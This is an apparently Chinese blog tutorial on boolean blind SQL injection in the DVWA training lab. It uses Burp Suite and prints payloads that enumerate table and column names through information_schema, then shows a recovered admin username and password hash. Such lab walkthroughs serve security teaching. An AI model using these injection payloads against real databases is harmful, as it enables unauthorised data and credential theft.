SQL注入的原理与攻防实战4

本文介绍了在dvwa靶场中使用burpsuite进行SQL盲注入的实践,通过布尔型盲注获取数据库名称后,进一步获取了表名guestbookusers,并展示了如何利用工具抓包来判断字段名,最终揭示了账号密码信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上期回顾

上期我们简单介绍了SQL盲注入的相关知识,以及盲注入之一的基于布尔型的盲注入,并且根据burp suite进行了数据库名称的获取,本章我们将利用burp suite进行其他信息的获取。

1:实验环境:

dvwa靶场(low),burp suite,火狐浏览器

2:抓包测试:

打开火狐浏览器:

1'and if(substring((select TABLE_NAME from information_schema.TABLES where
TABLE_SCHEMA=database() limit 1),1,1)='g',1,0)--+
利用上述代码去抓包

然后按下图所示设置好变量:

在这里插入图片描述
设置好payload之后提交攻击,筛选200得到下图:

在这里插入图片描述
获取表名 guestbook users

目前已知:dvwa库下有两个表:guestbook users
接下来我们尝试获取字段名:
1’and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘users’ and TABLE_SCHEMA=database() limit 0,1),1,1)=‘i’,1,0)–+

当前库的表的第一个列字符是否等于 i ,如果等于 i ,返回正则页面,否则返回错误页面。

然后利用burp suite进行抓包:

在这里插入图片描述

得到user_id:
修改200,201,即可获取其他字段(这里只演示如何获取第一个字段)

根据字段的获取:我们可以知道里面存放了密码:接下来我们进行账号密码的获取:

最后整理结果得出 admin:5f4dcc3b5aa765d61d8327deb882cf99

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值